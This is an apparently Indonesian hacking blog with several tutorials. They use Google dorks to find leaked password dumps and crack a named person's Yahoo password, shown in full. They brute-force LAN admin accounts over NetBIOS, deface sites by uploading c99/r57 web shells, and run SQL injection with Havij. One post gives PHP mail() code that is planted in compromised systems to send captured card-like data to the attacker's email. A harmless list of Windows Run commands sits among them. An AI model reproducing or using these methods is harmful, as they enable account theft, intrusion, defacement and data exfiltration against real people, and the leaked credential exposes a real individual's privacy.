2 Juli 2012 at 7/02/2012 05:05:00 AM | 0 comments  
Posted by Pratama Sitinjak
Hacking Email – Hotmail Yahoo Gmail
24 Juni 2011 at 6/24/2011 11:10:00 AM | 0 comments  
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT
Btw langsung saja ke TKP :
Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita.
Persyaratan:
Google Dorks:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com
Online Hash Cracker:
http://md5crack.com/
Ok mari kita mulai:
Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban
Hack Email Hotmail
Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash
Hack Gmail - Hacking Email
Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d
Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran.
Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut:
Hacking Yahoo EMail
Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707
Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,…
Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..
Posted by Pratama Sitinjak
Hacking Local Area Network
at 6/24/2011 11:05:00 AM | 0 comments  
Hack Local Area Network – LAN Hack – LAN Hacking.
This technique will be taking advantage of Port 139.
Most of the time,Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
[Image: 1_13.jpg]
I get the result and it shows Port 139 is opened up for me.
Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.
[Image: 2_1.jpg]
You now need to create a null session to the target computer.
[Image: 3_3.jpg]
Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.
[Image: 4_10.jpg]
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
“5 21 861567501 1383384898 839522115 500″.
Please leave out the S-1-,leave out all the – too.
[Image: 5_8.jpg]
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.
[Image: 6.jpg]
Prepare yourself a good wordlist.
[Image: 7.jpg]
Now put both of them in the same directory with the NetBios Auditing Tool.
[Image: 8.jpg]
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
[Image: 9_1.jpg]
Press on enter and the tool will run through the passlist.
[Image: 10.jpg]
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
[Image: 11.jpg]
After you press enter,it will prompt you for the username and password.
[Image: 12_6.jpg]
Therefore,just input them inside the prompt and continue.
[Image: 13.jpg]
Target C drive will be on your screen.
[Image: 14.jpg]
In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar
Posted by Pratama Sitinjak
hack Deface Website
at 6/24/2011 10:41:00 AM | 0 comments  
Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..
Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:
  1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
  2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan tools sendiri “File Manager Binus Hacker” :) (Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection
  3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html
  4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.
Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:
Deface Website - Website Target

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php
Deface Website - Update Shell

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html
Defacing Website - Membuat Halaman Defacement
Kemudian kita save menjadi: “HACKED.html
Defacing Website - Halaman Deface Page

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.
Deface Website - Lokasi Home Directory Website
Upload file HACKED.html, dari local computer yang anda simpan tadi.
Deface Website - Cara Upload Page Defacement
Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:
Deface Website - Hasil Upload File Hacked Html
Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:
Defacing Website - CHMOD file

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:
Defacement Website - Result
Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.
Enjoy & Eat It!
Posted by Pratama Sitinjak
SQL Injection Menggunakan HAVIJ
at 6/24/2011 10:39:00 AM | 0 comments  
Dunia sekarang sungguh sangat dipermudah, tinggal jadi pemakai sudah bisa langsung jago dalam hal SQL Injection, tanpa harus mengetahui dasar-dasarnya. You can call your self what?
Oke lah, ini hanya sekedar sharing bagaimana caranya SQL Injection Havij:
1. Silakan cari target dengan menggunakan SQL Injection Vulnerability, bisa di cari dan didapat dari exploit-db.com, silakan ditemukan disini: http://www.exploit-db.com/webapps , cari vulnerability yang memiliki keyword “SQL INJECTION“.
2. Kemudian silakan download HAVIJ TOOLS FREE atau DOWNLOAD HAVIJ PRO (Thanks To AcizNinja For Update):
Download Havij Pro
3. Wajib untuk download bantuan & help berikut: PDF HELP & CHM HELP
4. Berikut ini adalah beberapa images HAVIJ TOOLS:
Havij
Havij
Havij
Havij
Havij
5. Langkah-langkah utama dalam Havij:
  • Temukan website yang memiliki Vulnerable SQL Injection
  • Masukkan target yang vulnerable tersebut ke tab “Target” di Havij tanpa tanda ‘
  • Kemudian klik Analyze
  • Menu-menu yang ada silakan dipelajari di HELP PDF & HELP CHM yang sudah di download untuk fungsi masing-masing.
Hal apa saja sih yang bisa didapatkan dengan menggunakan tools ini?
  1. Anda bisa melakukan deface website dengan HAVIJ
  2. Anda bisa melakukan copy / save database dengan HAVIJ
  3. Anda bisa menemukan admin login dengan HAVIJ
  4. Anda bisa menjadi administrator website dengan HAVIJ
  5. Selanjutnya tergantung dari sejauh mana kelihaian anda dalam mengolah target :D
Posted by Pratama Sitinjak
Shortcut Perintah Windows
at 6/24/2011 10:33:00 AM | 0 comments  
Ingin mengoperasikan komputer anda dengan cepat? Ingat perintah ini. Ini benar-benar akan menghemat banyak waktu Anda. Ada banyak perintah yang mungkin belum pernah anda lihat atau tidak tahu. Ada sifat tertentu dari windows yang anda tidak tahu ada di system.

Dibawah ini terdapat 112 perintah yang dapat dijalankan pada Aplikasi Run, dimana di sebelah kiri adalah fungsi aplikasi, dan disebelah kanan adalah fungsi perintah yang dapat anda jalankan dengan mengklik Start, Run, lalu ketik perintah kemudian klik Ok.
  1. Accessibility Controls ==>Perintah==>access.cpl
  2. Add Hardware Wizard ==>Perintah==> hdwwiz.cpl
  3. Add/Remove Programs =>Perintah==> appwiz.cpl
  4. Administrative Tools =>Perintah=> control admintools
  5. Automatic Updates==>Perintah==>wuaucpl.cpl
  6. Bluetooth Transfer Wizard==>Perintah==>fsquirt
  7. Calculator==>Perintah==>calc
  8. Certificate Manager==>Perintah==>certmgr.msc
  9. Character Map==>Perintah==>charmap
  10. Check Disk Utility==>Perintah==>chkdsk
  11. Clipboard Viewer==>Perintah==>clipbrd
  12. Command Prompt==>Perintah==>cmd
  13. Component Services==>Perintah==>dcomcnfg
  14. Computer Management==>Perintah==>compmgmt.msc
  15. Date/Time Properties==>Perintah==>timedate.cpl
  16. DDE Share==>Perintah==>ddeshare
  17. Device Manager==>Perintah==>devmgmt.msc
  18. Direct X Control Panel (If Installed)*==>Perintah==>directx.cpl
  19. Direct X Troubleshooter==>Perintah==>dxdiag
  20. Disk Cleanup Utility==>Perintah==>cleanmgr
  21. Disk Defragment==>Perintah==>dfrg.msc
  22. Disk Management==>Perintah==>diskmgmt.msc
  23. Disk Partition Manager==>Perintah==>diskpart
  24. Display Properties==>Perintah==>control desktop
  25. Display Properties==>Perintah==>desk.cpl
  26. Display Properties (w/Appearance Tab Preselected)==>Perintah==>control color
  27. Dr. Watson System Troubleshooting Utility==>Perintah==>drwtsn32
  28. Driver Verifier Utility==>Perintah==>verifier
  29. Event Viewer==>Perintah==>eventvwr.msc
  30. File Signature Verification Tool==>Perintah==>sigverif
  31. Findfast==>Perintah==>findfast.cpl
  32. Folders Properties==>Perintah==>control folders
  33. Fonts==>Perintah==>control fonts
  34. Fonts Folder==>Perintah==>fonts
  35. Free Cell Card Game==>Perintah==>freecell
  36. Game Controllers==>Perintah==>joy.cpl
  37. Group Policy Editor (XP Prof)==>Perintah==>gpedit.msc
  38. Hearts Card Game==>Perintah==>mshearts
  39. Iexpress Wizard==>Perintah==>iexpress
  40. Indexing Service==>Perintah==>ciadv.msc
  41. Internet Properties==>Perintah==>inetcpl.cpl
  42. IP Configuration (Menampilkan konfigurask koneksi)==>Perintah==>ipconfig /all
  43. IP Configuration (Menampilkan konentens DNS Cache)==>Perintah==>ipconfig /displaydns
  44. IP Configuration (Mendelete DNS konten Cache)==>Perintah==>ipconfig /flushdns
  45. IP Configuration (Pelepasan Semua Koneksi)==>Perintah==>ipconfig /release
  46. IP Configuration (Memperbaharui Semua Koneksi)==>Perintah==>ipconfig /renew
  47. IP Configuration (Refreshes DHCP & Re-Registers DNS)==>Perintah==>ipconfig /registerdns
  48. IP Configuration (Menampilkan DHCP Class ID)==>Perintah==>ipconfig /showclassid
  49. IP Configuration (Memodifikasi DHCP Class ID)==>Perintah==>ipconfig /setclassid
  50. Java Control Panel (Jika diinstall)==>Perintah==>jpicpl32.cpl
  51. Java Control Panel (Jika diinstall)==>Perintah==>javaws
  52. Keyboard Properties==>Perintah==>control keyboard
  53. Local Security Settings==>Perintah==>secpol.msc
  54. Local Users and Groups==>Perintah==>lusrmgr.msc
  55. Logs You Out Of Windows==>Perintah==>logoff
  56. Microsoft Chat==>Perintah==>winchat
  57. Minesweeper Game==>Perintah==>winmine
  58. Mouse Properties==>Perintah==>control mouse
  59. Mouse Properties==>Perintah==>main.cpl
  60. Network Connections==>Perintah==>control netconnections
  61. Network Connections==>Perintah==>ncpa.cpl
  62. Network Setup Wizard==>Perintah==>netsetup.cpl
  63. Notepad==>Perintah==>notepad
  64. Nview Desktop Manager (If Installed)==>Perintah==>nvtuicpl.cpl
  65. Object Packager==>Perintah==>packager
  66. ODBC Data Source Administrator==>Perintah==>odbccp32.cpl
  67. On Screen Keyboard==>Perintah==>osk
  68. Opens AC3 Filter (If Installed)==>Perintah==>ac3filter.cpl
  69. Password Properties==>Perintah==>password.cpl
  70. Performance Monitor==>Perintah==>perfmon
  71. Phone and Modem Options==>Perintah==>telephon.cpl
  72. Power Configuration==>Perintah==>powercfg.cpl
  73. Printers and Faxes==>Perintah==>control printers
  74. Printers Folder==>Perintah==>printers
  75. Private Character Editor==>Perintah==>eudcedit
  76. Quicktime (If Installed)==>Perintah==>QuickTime.cpl
  77. Regional Settings==>Perintah==>intl.cpl
  78. Registry Editor==>Perintah==>regedit
  79. Registry Editor==>Perintah==>regedit32
  80. Remote Desktop==>Perintah==>mstsc
  81. Removable Storage==>Perintah==>ntmsmgr.msc
  82. Removable Storage Operator Requests==>Perintah==>ntmsoprq.msc
  83. Resultant Set of Policy (XP Prof)==>Perintah==>rsop.msc
  84. Scanners and Cameras==>Perintah==>sticpl.cpl
  85. Scheduled Tasks==>Perintah==>control schedtasks
  86. Security Center==>Perintah==>wscui.cpl
  87. Services==>Perintah==>services.msc
  88. Shared Folders==>Perintah==>fsmgmt.msc
  89. Shuts Down Windows==>Perintah==>shutdown
  90. Sounds and Audio==>Perintah==>mmsys.cpl
  91. Spider Solitare Card Game==>Perintah==>spider
  92. SQL Client Configuration==>Perintah==>cliconfg
  93. System Configuration Editor==>Perintah==>sysedit
  94. System Configuration Utility==>Perintah==>msconfig
  95. System File Checker Utility (Segera scan)=>Perintah=>sfc /scannow
  96. System File Checker Utility (Pindai Sekali Pada Boot Berikutnya)  =>Perintah=>sfc /scanonce
  97. System File Checker Utility (Scan seluruh Boot)=>Perintah=>sfc /scanboot
  98. System File Checker Utility (Kembali ke setting Default)=>Perintah=>sfc /revert
  99. System File Checker Utility (Purge File Cache)==>Perintah==>sfc /purgecache
  100. System File Checker Utility (Set Cache Size untuk ukuran x)==>Perintah==>sfc /cachesize=x
  101. System Properties==>Perintah==>sysdm.cpl
  102. Task Manager==>Perintah==>taskmgr
  103. Telnet Client==>Perintah==>telnet
  104. User Account Management==>Perintah==>nusrmgr.cpl
  105. Utility Manager==>Perintah==>utilman
  106. Windows Firewall==>Perintah==>firewall.cpl
  107. Windows Magnifier==>Perintah==>magnify
  108. Windows Management Infrastructure==>Perintah==>wmimgmt.msc
  109. Windows System Security Tool==>Perintah==>syskey
  110. Windows Update Launches==>Perintah==>wupdmgr
  111. Windows XP Tour Wizard==>Perintah==>tourstart
  112. Wordpad==>Perintah==>write
Posted by Pratama Sitinjak
cara hack facebook/yahoo 2011
at 6/24/2011 10:28:00 AM | 0 comments  
Berikut ini gw mau jelasin trik yang sangat menarik buat anda pelajarin. Merupakan sebuah logging informasi data yang masuk, dan kemudian dikirim ke email kita. Ini sempet dibahas di BinusHacker Hack Show 30 Mei 2009 di #BinusHacker @Irc.Dal.Net
Lets begin!
Memaksimalkan Fungsi Email
= Hacking is Knowledge =
Tujuan dari memaksimalnya email pada topic ini adalah untuk logging informasi & data!
Pertama:
Kita menggunakan script PHP (Private Home Page)
Fungsi yang kita pake adalah mail();
Dimana pengiriman email dilakukan:
contoh:
<?php
// Contoh penggunaan
$Orangnya = “Budi Anduk”;
$NoId = “123456789″;
$CID = “234″;
$Exp = “10/2009″;
$Nama = “Nama Pengirim”;
$Emailnya = “email@pengirim.com”; // Email Pengirim
$Penerima = “emailanda@yahoo.com”; // Email Anda Sebagai Penerimas
$IsiEmail = “Berikut Ini Isi Log Data: “. $Orangnya .” “. $NoId .” “. $CID .” “. $Exp .” “; // Isi Email
$Subject = “Logging Data & Informasi”; // Judul Email
$Header = “From: “. $Nama . ” <” . $Emailnya . “>\r\n”; // Untuk Header
mail($Penerima, $Subject, $IsiEmail, $Header);
?>
Dari contoh di atas maka dapat kita simpulkan bahwa, kita bisa menggunakan fasilitas pengirim email untuk melakukan logging :)
Terkadang banyak file yang terenkripsi yang ada didatabase
Sehingga kita susah untuk melakukan decryptnya
Maka cara ini dapat kita gunakan..
Jika kita mendapatkan sebuah target dalam system,
dan disitu terjadi aktifitas pengiriman data ke database server dari client
Maka, kita dapat melakukan pengambilan data sebelum dilakukan encyption
Dengan cara menyisipkan variable” baru, yang bisa kita gunakan untuk menyimpan informasi & data
Kemudian kita kirim ke email kita tanpa terenkripsi sama skali..
Enak bukan? Hahahha.. That is the concept!
Silakan baca artikel, analisa script, silakan download dibawah:
Nah, untuk penjelasan lengkapnya anda bisa download tutorial dan ujicoba lengkapnya di:
http://www.indowebster.com/EmailLoggingHckShow.html
Untuk melakukan hasil contohnya, anda upload semua file ke sebuah hosting, kemudian praktekkan sesuai dengan contoh.
Jangan lupa ganti email pengirim menjadi:
<?
$Penerima = “emailanda@domainemailanda.com”; // Email Anda Sebagai Penerima
?>
Selamat mencoba! Semoga berhasil :D
Enjoy & Eat it!
Posted by Pratama Sitinjak
Visit the Site
MARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. blogger template by blog forum.